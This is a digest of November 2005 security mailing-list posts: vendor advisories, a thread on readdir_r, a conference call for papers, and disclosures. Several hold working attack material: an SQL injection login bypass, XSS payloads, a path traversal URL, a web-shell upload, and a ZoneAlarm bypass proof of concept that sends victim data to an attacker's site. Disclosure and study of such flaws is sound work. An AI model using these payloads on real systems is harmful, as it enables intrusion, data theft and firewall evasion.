Hidden accounts on sony vaio laptops
Sony Vaio laptops require you to create a user account the first time you start your laptop. If the user you select is not "Administrator", Sony still goes ahead and creates a user "Administrator" with a blank password. This user does not show up in control panel under User Accounts but if you do start up in safemode the laptop allows you to login as Administrator. This gives an attacker an opportunity to gain administrative access to a computer and access to create add delete or modify user accounts. This is basically a backdoor account that is hidden from the user and compromises the security of all Sony Vaio laptops. -- Securityforge: For all your security needs (http://www.securityforge.com) Dbtech: Get the best programmers for your buisness (http://www.dbtech.org)
[TKADV2005-11-001] Multiple vulnerabilities in PHPlist
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Advisory:Multiple vulnerabilities in PHPlist Name:TKADV2005-11-001 Revision:1.0 Release Date:2005/11/07 Last Modified: 2005/11/07 Author: Tobias Klein (tk at trapkit.de) Affected Software: PHPlist (all versions <= 2.10.1) Risk:Critical ( ) High (x) Medium (x) Low (x) Vendor URL: http://www.phplist.com/ Vendor Status: Vendor has released an updated version = Overview: = PHPlist is a double opt-in newsletter manager. It is written in PHP and uses a SQL database for storing the information. Version 2.10.1 and prior contain multiple Cross Site Scripting and SQL Injection vulnerabilities. Furthermore it is possible to access and read arbitrary system files through a vulnerability in PHPlist. = Solution: = Upgrade to PHPlist 2.10.2 or newer. http://www.phplist.com/files/ For more technical details see: http://www.trapkit.de/advisories/TKADV2005-11-001.txt -BEGIN PGP SIGNATURE- Version: PGP 8.1 iQA/AwUBQ2+xMpF8YHACG4RBEQLokQCg7cyW6AfrNYY7WZ06mPBrH3uos/cAn06l roUuWofKu3koFc4l62Za1mEY =rRgy -END PGP SIGNATURE-
LayerOne 2006 CFP Released
LayerOne 2006 - Call for Papers April 22 & 23, 2006 Los Angeles, California At the Pasadena Hilton http://layerone.info What is LayerOne? Currently in its 3rd year, LayerOne is computer security and technology conference held in the Los Angeles area. The purpose of LayerOne is to bring together the many different types of folks who make up the security community for a 2 day discussion of the technologies that impact our professional and personal lives. Who should attend LayerOne? Just about anyone who is concerned with computer, information, and Internet security and the issues arising from it. Developers, System Administrators, Lawyers, IT managers, Students, Hackers, Engineers, Privacy Advocates, Hardware Hackers, Open Source fans, and garden variety Geeks will all find something of interest at LayerOne. Previous speakers have included the likes of Dan Kaminsky (Doxpara Research), Dave Hulton (Toorcon), Danny O'Brien (NTK), and Bruce Potter (Shmoo Group). Call for Papers. LayerOne is now officially accepting papers and presentations for consideration at our 2006 show. We are looking for people to speak on a broad range of topics, so all submissions will be considered. At the moment we're interested in hearing from potential speakers with the following interests: * Data Forensics * Reverse Engineering * VoIP (security and development) * Emerging Security Trends * Regulatory Issues (SOX, PCI, ISO 17799, etc) * Firmware/Embedded Systems Hacking Please note that we'd love to see as broad a range of topics this year as we did last year, so don't consider this to be a strict guideline on what we'd like people to be submitting. If you've got something that you think will fit, by all means send it in. To see a list of topics from 2005, please visit our website. Please be sure to include the following information in your submission: * Presentation name * A one-sentence synopsis of your presentation * A longer one to three paragraph synopsis or short outline of what you plan on covering * Names of and URLs to presenter(s) * A short (single-paragraph) biography of the presenter(s) Once everything's ready to go, send your submission to cfp [at] layerone [dot] info no later than March 31, 2006. All papers submitted by then will receive either an acceptance or rejection notice no later than April 5th, 2006. Speaker selection is expected to be finalized on this date. Although we only have one speaking track, please bear in mind that speaking slots are limited to one hour. How you use that time is entirely up to you - but most people tend to divide it between presentation and a Q&A session. If you think your presentation will run longer please advise us when you turn in your proposal and we will do our best take your needs into consideration. If the presentation is based on code or a particular technique the presenter must be one of the developers of the code/technique and be prepared to perform a demonstration. We look forward to reading over your submissions, which we are sure will be outstanding. Once again, if you have any questions or submissions please email cfp [at] layerone [dot] info. Thank you for your interest, and we look forward to seeing you there.
e107 Games System exploit
You get insert a highscore into game_score.php using post method. The system uses these variables, so a simple form will allow you to add a highscore. $player_name = $_POST['name']; $player_score = $_POST['score']; $game_name = $_POST['game']; willeh willey_wonka at hotmail dot com
Re: [Full-disclosure] Re: readdir_r considered harmful
>On 11/6/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: >> I don't see how that is relevant; the typical use of readdir() is as follows: >> >> DIR *dirp = opendir(name); >> >> while ((dent = readdir(dirp)) != NULL) { >> ... >> } >> >> closedir(dirp); >> >> Nothing other threads do with readdir() on different dirp's will influence >> what "dent" points to. > >The issue is multiple threads using the same DIR. No, it isn't. I certainly limited the scope of my contribution to single threads reading from a DIR. All the 80-odd uses of readdir_r() in the Solaris core source code, all can (and should) be replaced with readdir(). All have a single thread reading and reusing the same "struct dirent", so readdir() could be used in POSIXly correct fashion if the following sentence in the open group's manual page was not present: "The readdir() function need not be reentrant. A function that is not required to be reentrant is not required to be thread-safe." I believe that this is an error in POSIX; when "threadedness" was added the manual page could have been changed to indicate that a single thread using the above idiom was safe. Had they done so, we would never have had to use readdir_r() and progammers would not have introduced bugs in the (mis)use of pathconf, over allocating, etc. I would be interested in seeing any real-world use of readdir_r() in a context where readdir_r() is required (multiple threads reading from a single DIR *). Casper
Re: [Full-disclosure] Re: readdir_r considered harmful
On 11/6/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > I don't see how that is relevant; the typical use of readdir() is as follows: > > DIR *dirp = opendir(name); > > while ((dent = readdir(dirp)) != NULL) { > ... > } > > closedir(dirp); > > Nothing other threads do with readdir() on different dirp's will influence > what "dent" points to. The issue is multiple threads using the same DIR.
Re: [Full-disclosure] Re: readdir_r considered harmful
>Then you never really understood the implementation, seems. Of course >all implementations keep the content of the directory as read with >getdents or so in the DIR descriptor. But it is usually not the case >that the whole content fits into the buffer allocated. One could, of >course, resize the buffer to fit the content of the directory read, >even if this means reserving hundreds or thousands of kBs. But this >is not how most implementations work. I don't see how that is relevant; the typical use of readdir() is as follows: DIR *dirp = opendir(name); while ((dent = readdir(dirp)) != NULL) { ... } closedir(dirp); Nothing other threads do with readdir() on different dirp's will influence what "dent" points to. I have *never* seen a program where multiple threads read from a single dirp; and I can't image the use. >Instead implementations keep work similar to every buffered file I/O >operation. But this means that buffer content is replaced. If this >happens and some thread uses readdir() instead of readdir_r(), the >returned string pointer suddenly becomes invalid since it points to >memory which has been replaced. Yes, the next call to readdir() *on the same dirp* may change what the previous call; but that's completely irrelevant for most uses of readdir(). Of course, an application may want to save all readdir() return values, but that is completely orthogonal to threads; there is no reason why the POSIX *thread* specification includes readdir_r(). >Next time, before you make such comments, ask Don Cragun to explain >things to you. Next time before you mail, you might want to engage your brain. There is NO reason for a thread-safe library to use readdir_r() over readdir(), with common readdir() implementations. Casper
[USN-214-1] libungif vulnerabilities
=== Ubuntu Security Notice USN-214-1 November 07, 2005 libungif4 vulnerabilities CVE-2005-2974, CVE-2005-3350 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 4.10 (Breezy Badger) The following packages are affected: libungif4g The problem can be corrected by upgrading the affected package to version 4.1.0b1-6ubuntu0.1 (for Ubuntu 4.10), 4.1.3-1ubuntu0.1 (for Ubuntu 5.04), or 4.1.3-2ubuntu0.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Chris Evans discovered several buffer overflows in the libungif library. By tricking an user (or automated system) into processing a specially crafted GIF image, this could be exploited to execute arbitrary code with the privileges of the application using libungif. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.0b1-6ubuntu0.1.diff.gz Size/MD5: 299066 b1e73895c7e0ad79c0e19e6cdc17e0a0 http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.0b1-6ubuntu0.1.dsc Size/MD5: 654 e77c0c985a9a69be2306521c68c90948 http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.0b1.orig.tar.gz Size/MD5: 351757 20d96eb90cf818a1da093614c44ad3e5 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.0b1-6ubuntu0.1_amd64.deb Size/MD5: 220664 20b10d4a5722c313fb9087e9637d3932 http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4-dev_4.1.0b1-6ubuntu0.1_amd64.deb Size/MD5:36512 7267a1987fbabd4933e000ccb1506db3 http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4g_4.1.0b1-6ubuntu0.1_amd64.deb Size/MD5:52450 e518ccb9521345253a7195baf59d304c i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.0b1-6ubuntu0.1_i386.deb Size/MD5: 202984 f68d125ce049c9507756e83bad2549dc http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4-dev_4.1.0b1-6ubuntu0.1_i386.deb Size/MD5:34294 3b22cf5ce6d91f4f9f1c27e9a9ec6d75 http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4g_4.1.0b1-6ubuntu0.1_i386.deb Size/MD5:51064 ce716cf26fdc0b27230dafea49d005c0 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.0b1-6ubuntu0.1_powerpc.deb Size/MD5: 235062 acc2f9eb7dfc2a0f1e4551a2217fc579 http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4-dev_4.1.0b1-6ubuntu0.1_powerpc.deb Size/MD5:36562 84f4b4a0ed7e5f5a35b9ac7789e70a3e http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4g_4.1.0b1-6ubuntu0.1_powerpc.deb Size/MD5:53420 c0b95884ad01a6ec49aa4a0fbbd71411 Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.3-1ubuntu0.1.diff.gz Size/MD5:27712 4835a55c199b8bad795cb36ccd844b32 http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.3-1ubuntu0.1.dsc Size/MD5: 639 7a91eda1b7d0ec48c26f69518e6787f9 http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.3.orig.tar.gz Size/MD5: 569667 cb11e300347ad29e502abc6f56fd23df amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.3-1ubuntu0.1_amd64.deb Size/MD5: 224438 efe72b94ed939de9b85e556e07fb228d http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4-dev_4.1.3-1ubuntu0.1_amd64.deb Size/MD5:41158 381aaff6c58f9402275bf37cf3c58abf http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4g_4.1.3-1ubuntu0.1_amd64.deb Size/MD5:57506 88918dea5ab32a782a8e1d731a4b4f24 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.3-1ubuntu0.1_i386.deb Size/MD5: 206076 a81c6995f1e3ebbba7ce725171574b59 http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4-dev_4.1.3-1ubuntu0.1_i386.deb Size/MD5:38928 8def52728fce5ef3fcaf3137c3cd2ce3 http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4g_4.1.3-1ubuntu0.1_i386.deb Size/MD5:56194 474750d2fddcf82434a136014e1cb2d9 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.3-1ubuntu0.1_powerpc.deb Size/MD5: 238938 f36748ba01f1527ef18be9ccf8c51456 http://security.ubuntu.co
Zone Labs Products Advance Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability
Zone Labs Products Advance Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability I. PRODUCT BACKGROUND ZoneAlarm Pro and Internet Security Suite with its a new level of protection is what Zone Labs calls an "OS Firewall" based on "Behavior Based Analysis" has gone beyond network level protection and protects PCs against various local attacks on a windows machine. Currently available personal firewalls protects PCs against only network based attacks however the new Zone Labs "OS firewall" technology monitors activity at the kernel-level and prevents attacks at various level. The new approach alerts the user by closely monitoring at kernel level for any unusual activity in the system; like changes in critical registry keys, changes in start-up entries, any kind of Interprocess interactions and processes making outbound connections via other trusted programs. When ZoneAlarm sees unusual activity between applications, it can put the kibosh on memory being read, or quash unauthorized driver and service loading. The PoC below discusses how the ZoneAlarm Advance Program Control and Behavior Based Technology can be defeated by using HTML Modal Dialog Box. II. TECHNICAL DESCRIPTION Zone Alarm products with Advance Program Control or OS Firewall Technology enabled, detects and blocks almost all those APIs (like Shell, ShellExecuteEx, SetWindowText, SetDlgItem etc) which are commonly used by malicious programs to send data via http by piggybacking over other trusted programs. However, it is still possible for a malicious program (Trojans or worms etc) to make outbound connections to the evil site by piggybacking over trusted Internet browser using "HTML Modal Dialog" in conjunction with simple "JavaScript". Here it is assumed that the default browser (IE or Firefox etc) has authorization to access internet. In case of the default installation of ZoneAlarm Pro, IE is by default allowed to access internet. The PoC (Proof-of-Concept) in Section V explains the hack and the exploit code is also included for reference. III.IMPACT On successful exploitation the malicious program will be able to send the victim's details and personal system information to the attacker and this can further leads to complete system compromise. IV. AFFECTED PRODUCTS Zone Alarm Pro 6.0.x Zone Alarm Internet Security Suit 6.0.x Zone Alarm Firewall with Anti-Spyware 6.1.x Zone Alarm Firewall with Anti-Virus 6.0.x Zone Alarm Firewall (Free Version) 6.0.x V. PROOF-OF-CONCEPT: By using ShowHTMLDialog() method, it is possible for any malicious program to creates a modal dialog box that displays HTML. This in turn can be used to redirect the page to the attacker's site. It is observed that using this method, ZA Pro and Internet Security Suit is unable to block internet access. This method can be used by any malicious program to send data outside via http to the attacker and at the same time it can also receive the command instructions from the attacker. The detailed exploit code is given below: <<< osfwbypass-demo.c >>> BOOL LoadHtmlDialog(void) { HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL")); if (hinstMSHTML) { SHOWHTMLDIALOGFN* pfnShowHTMLDialog; // Open a Modal Dialog box of HTML content type pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML, TEXT("ShowHTMLDialog")); if (pfnShowHTMLDialog) { IMoniker *pURLMoniker; // Invoke the html file containing the data to be sent via http BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm"); CreateURLMoniker(NULL, bstrURL, &pURLMoniker); if (pURLMoniker) { (*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL); pURLMoniker->Release(); } SysFreeString(bstrURL); } FreeLibrary(hinstMSHTML); } Return True; } <<< +++ >>> <<< modal-dialog.htm >>> Redirection Dialog var sTargetURL = "http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[Your Information Here] window.location.href = sTargetURL; window.close; <<< +++ >>> VI. DEMONSTRATION: For a live demonstration, the compiled binary ("osfwbypass-demo.exe") and the html redirection script ("modal-dialog.htm") has been enclosed with this advisory. To test, kindly follow the following steps: a. Extract both "osfwbypass-demo.exe" and "modal-dialog.htm" to "C:\". [Note: You can extract "osfwbypass-demo.exe" to whatever location you like but don't change the location of "modal-dialog.htm" other than "C:\" otherwise the PoC won't work.] -> Just to save time, I had to hardcode the path. b. Run "osfwbypass-demo.exe" and click on the "GO" button. This will open "modal-dialog.htm" in modal dialog box which further will redirect to the evil site and send the sample user info via the url to the evil site. c. First
Re: [Full-disclosure] Re: readdir_r considered harmful
On 11/5/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > Why not: > > 4. Require the readdir() implementation to use state local to dirp. > > I've never understood the rationale behind readdir_r; Then you never really understood the implementation, seems. Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work. Instead implementations keep work similar to every buffered file I/O operation. But this means that buffer content is replaced. If this happens and some thread uses readdir() instead of readdir_r(), the returned string pointer suddenly becomes invalid since it points to memory which has been replaced. Next time, before you make such comments, ask Don Cragun to explain things to you.
Re: Re: Mambo Open Source, Path disclosure
You are right mamboserver soloution is available now: The fix is easy, in /component/com_content/content.php Approx Line 190 Change the block FROM: Code: // Paramters $params = new stdClass(); if ( $Itemid ) { $menu = new mosMenu( $database ); $menu->load( $Itemid ); $params =& new mosParameters( $menu->params ); } else { $menu = ""; $params =& new mosEmpty(); } CHANGE TO READ: Code: // Paramters $params = new stdClass(); if ( $Itemid ) { $menu = new mosMenu( $database ); $menu->load( $Itemid ); $params =& new mosParameters( $menu->params ); } else { $menu = ""; $params =& new mosParameters(''); //mosEmpty(); } best regards Alireza Hassani Security Science Researchers Institute Of Iran [http://www.KAPDA.ir]
Advanced Guestbook 2.2 ( SQL Injection Exploit )
Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access. Target : http://www.example.com/[GuestbookTarget]/admin.php Username: ' or 1=1 /* Password: (Nothing)(Blank) It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability. Report By : POPO ( Pooya ) >From www.Babol-Hackers.com [EMAIL PROTECTED] Y! ID : bhs_team , pooya_0nline --- BHS-Team We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p
Asterisk vmail.cgi vulnerability
Assurance.com.au - Vulnerability Advisory --- Release Date: 07-Nov-2005 Software: Asterisk Web-VoiceMail (Comedian VoiceMail) http://www.asterisk.org/ Asterisk is a complete PBX in software. It runs on Linux, BSD and MacOSX and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in many protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. Versions affected: Asterisk Versions <= 1.0.9 Asterisk Beta Versions <= 1.2.0-beta1 Asterisk @ Home Versions <= 1.5 Asterisk @ Home Beta Versions <= 2.0 Beta 4 Vulnerability discovered: A vulnerability in the voicemail retrieval system allows an authenticated user to download any .wav/.WAV file from the system, including other users voicemail messages. Vulnerability impact: Low - Insecure web-ui causes breach of privacy Vulnerability information vmail.cgi doesn't clean a parameter passed by the web user which is later used to open a file and return a raw stream to the user. This allows any authenticated user of the voicemail system to listen to other peoples messages, or to open any file with the extension .wav/.WAV on the system. Example: http://asterisk.example.org/cgi-bin/vmail.cgi?action=audio&; \ folder=../201/INBOX&mailbox=200&context=default&password=12345 \ &msgid=0001&format=wav This will return /var/spool/asterisk/voicemail/default/201/INBOX/msg0001.wav when logged in as the 'extension 200' user. Solution: Asterisk has released patches for the vulnerabilities. Ensure you are running Asterisk versions > 1.0.9 / 1.2.0-beta1 Ensure you are running Asterisk @ Home versions > 1.5 / 2.0 beta 4 References: Assurance.com.au advisory http://www.assurance.com.au/advisories/200511-asterisk.txt Asterisk advisory note http://www.asterisk.org/changelog Credit: Adam Pointon of Assurance.com.au http://www.assurance.com.au/ Disclosure timeline: 17-Oct-2005 - Discovered during a quick audit of the asterisk web ui 18-Oct-2005 - Email sent to support and the primary author 18-Oct-2005 - Immediate response received 31-Oct-2005 - Patched version committed to CVS 07-Nov-2005 - Advisory released About us: Assurance.com.au is a specialised information security consultancy. Our mission is to help organisations identify and secure their information assets. Our expertise concentrates in security architecture design, managed security and professional services in security testing/review and compliance. Supporting this approach are professional and managed services in the following areas: * Compliance Services - Penetration testing, security reviews, compliance and audit services * Wireless and mobility solutions - design, installation and management of IEEE 802.11a/b/g (WiFi), tele-mobility and other wireless solutions * UNIX-like systems, network and security advice and consulting Assurance.com.au also provides organisations with services to support compliance to legislative, public and internal/private standards. While primarily specialising in Australian & New Zealand standards efforts Assurance.com.au also works with other international standards related to information security These include: * ISO/IEC 17799:*, AS/NZS 17799:*, BS7799 * ISO 15408 (Common Criteria), ITSEC, TCSEC * ISO 13569, ISO 11131 * ACSI33, AS2805, AS3806, AS4360, AS4539, AS8018, HB231:2001, NPP4 (privacy) * Sarbanes-Oxley
Invision Power Board 2.1 : Multiple XSS Vulnerabilities
Fast translation of benji's advisory *** Author : benjilenoob WebSite : http://benji.redkod.org/ and http://www.redkod.org/ Audit in pdf : http://benji.redkod.org/audits/ipb.2.1.pdf Product : Invision power board Version : 2.1 Tisk : Low. XSS I- XSS non critical: 1.Input passed to the $address variable isn't properly verified in the administrative section. This can be exploited by providing a valid login, and javascript code in the variable. The code will be executed in a user's browser session in context of an affected site. PoC: http://localhost/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete This could be exploited to steal cookie information. 2. Input passed to the "ACP Notes" textarea field in the administrative section isn't properly verified. This can be exploited to insert javascript code in the notes. The code will be executed in a user's browser session in context of an affected site. PoC: '"/>alert(document.cookie) 3.Input passed to the "Member's Log In User Name", "Member's Display Name", "Email Address contains...", "IP Address contains...", "AIM name contains...", "ICQ Number contains...", "Yahoo! Identity contains...", "Signature contains...", "Less than n posts", "Registered Between (MM-DD-)", "Last Post Between (MM-DD-)" and "Last Active Between (MM-DD-)" members profiles parameters in the administrative section isn't properly verified. This can be exploited to insert javascript code. 4. Non-permanent XSS: http://localhost/2p1p0b3/upload/admin.php?adsess=[id]§ion=content&act=forum&code=new&name=[xss] 5. Non-permanent XSS after administrative login: http://localhost/2p1p0b3/upload/admin.php?name=[xss]&description=[xss] 6.Input passed to the "description" field of a "Component" in the "Components" section of the administrative section isn't properly verified. This can be exploited to insert javascript code. PoC: '"/>alert() 7. Input passed to the "Member Name", "Password", "Email Address" fields of a new member's profile in the administrative section isn't properly verified. This can be exploited to insert javascript code. 8. Input passed to the "Group Icon Image" field of a new Group in the administrative section isn't properly verified. This can be exploited to insert javascript code. 9. Input passed to the "Calendar: Title" of a new Calendar in the administrative section isn't properly verified. This can be exploited to insert javascript code. Benji Team RedKod http://www.redkod.org/ *** Regards, /JA http://www.securinfos.info smime.p7s Description: S/MIME Cryptographic Signature
[ GLSA 200511-06 ] fetchmail: Password exposure in fetchmailconf
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200511-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: fetchmail: Password exposure in fetchmailconf Date: November 06, 2005 Bugs: #110366 ID: 200511-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis fetchmailconf fails to properly handle file permissions, temporarily exposing sensitive information to other local users. Background == fetchmail is a utility that retrieves and forwards mail from remote systems using IMAP, POP, and other protocols. It ships with fetchmailconf, a graphical utility used to create configuration files. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-mail/fetchmail < 6.2.5.2-r1 >= 6.2.5.2-r1 Description === Thomas Wolff discovered that fetchmailconf opens the configuration file with default permissions, writes the configuration to it, and only then restricts read permissions to the owner. Impact == A local attacker could exploit the race condition to retrieve sensitive information like IMAP/POP passwords. Workaround == Run "umask 077" to temporarily strengthen default permissions, then run "fetchmailconf" from the same shell. Resolution == All fetchmail users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-mail/fetchmail-6.2.5.2-r1" References == [ 1 ] Fetchmail Security Advisory http://fetchmail.berlios.de/fetchmail-SA-2005-02.txt [ 2 ] CVE-2005-3088 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3088 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200511-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature
upload phpshell in PHPFM
upload phpshell in PHPFM discovered by rUnViRuS www.worlddefacers.net www.security-arab.com =-=-=-=-=-=-=-=-= the code shell :- --- > save as > cmd.php now upload in PHPFM =-=-=-= Used Shell =-=-=-= www.site.com/[file upload name]/[files]/cmd.php?cmd=[command linux] =-=-=-==-=-=-==-=-=-==-=-=-==-=-=-==-=-=-=
[ GLSA 200511-07 ] OpenVPN: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200511-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenVPN: Multiple vulnerabilities Date: November 06, 2005 Bugs: #16 ID: 200511-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis The OpenVPN client is potentially vulnerable to the execution of arbitrary code and the OpenVPN server is vulnerable to a Denial of Service issue. Background == OpenVPN is a multi-platform, full-featured SSL VPN solution. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-misc/openvpn < 2.0.4 >= 2.0.4 Description === The OpenVPN client contains a format string bug in the handling of the foreign_option in options.c. Furthermore, when the OpenVPN server runs in TCP mode, it may dereference a NULL pointer under specific error conditions. Impact == A remote attacker could setup a malicious OpenVPN server and trick the user into connecting to it, potentially executing arbitrary code on the client's computer. A remote attacker could also exploit the NULL dereference issue by sending specific packets to an OpenVPN server running in TCP mode, resulting in a Denial of Service condition. Workaround == Do not use "pull" or "client" options in the OpenVPN client configuration file, and use UDP mode for the OpenVPN server. Resolution == All OpenVPN users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openvpn-2.0.4" References == [ 1 ] CVE-2005-3393 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3393 [ 2 ] CVE-2005-3409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3409 [ 3 ] OpenVPN changelog http://openvpn.net/changelog.html Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200511-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 signature.asc Description: OpenPGP digital signature
Re: [Full-disclosure] Re: readdir_r considered harmful
On 06 Nov 05, at 01:00, [EMAIL PROTECTED] wrote: Then you never really understood the implementation, seems. Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work. I don't see how that is relevant; the typical use of readdir() is as follows: DIR *dirp = opendir(name); while ((dent = readdir(dirp)) != NULL) { ... } closedir(dirp); Nothing other threads do with readdir() on different dirp's will influence what "dent" points to. I have *never* seen a program where multiple threads read from a single dirp; and I can't image the use. In practice, you're correct. In theory, however, consider the following code path. THREAD 1 THREAD 2 ---- DIR *d1 = opendir(dir1); DIR *d2 = opendir(dir2); dent1 = readdir(dir1); dent2 = readdir(dir2); use(dent1); In most implementations, dent1 != dent2. HOWEVER, there is no guarantee that they will not both point to the same statically allocated buffer, and some implementations may do so. For example, this is why ctime_r exists: ctime returns a pointer to a statically allocated buffer, and hence is not thread safe. You are correct, though, that the glibc implementation of readdir is thread-safe, so readdir_r is unnecessary in all common situations. PGP.sig Description: This is a digitally signed message part
XSS vulnerability in names.co.uk framed hosting
names.co.uk is an English registrar and web hosting company. Their frames-based hosting option has an XSS vulnerability allowing injection of arbitrary Javascript. For example: http://www.weddingbiz.co.uk/%22%3E%3Cframe%20src%3D%22javascript%3Aalert%281%29%22%20 According to webhosting.info, names.co.uk hosts 75k domains. If even a few percent are using the frames-based hosting option, then this vulnerability would affect thousands of sites. This vulnerability was reported twice to names.co.uk in early September 2005 (ticket SU197304). Their response was that it was not a security risk.
[SECURITY] [DSA 884-1] New Horde3 packages fix insecure default installation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 884-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 7th, 2005 http://www.debian.org/security/faq - -- Package: horde3 Vulnerability : design error Problem type : remote Debian-specific: yes CVE ID : CVE-2005-3344 Debian Bugs: 332290 332289 Mike O'Connor discovered that the default installation of Horde3 on Debian includes an administrator account without a password. Already configured installations will not be altered by this update. The old stable distribution (woody) does not contain horde3 packages. For the stable distribution (sarge) this problem has been fixed in version 3.0.4-4sarge1. For the unstable distribution (sid) this problem has been fixed in version 3.0.5-2 We recommend that you verify your horde3 admin account if you have installed Horde3. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1.dsc Size/MD5 checksum: 627 cc9b46f4b5a4f4a514ecbc51d9eb3a58 http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1.diff.gz Size/MD5 checksum: 6751 b0e7fb95efe86aeb42cfd0b478dd312b http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4.orig.tar.gz Size/MD5 checksum: 3378143 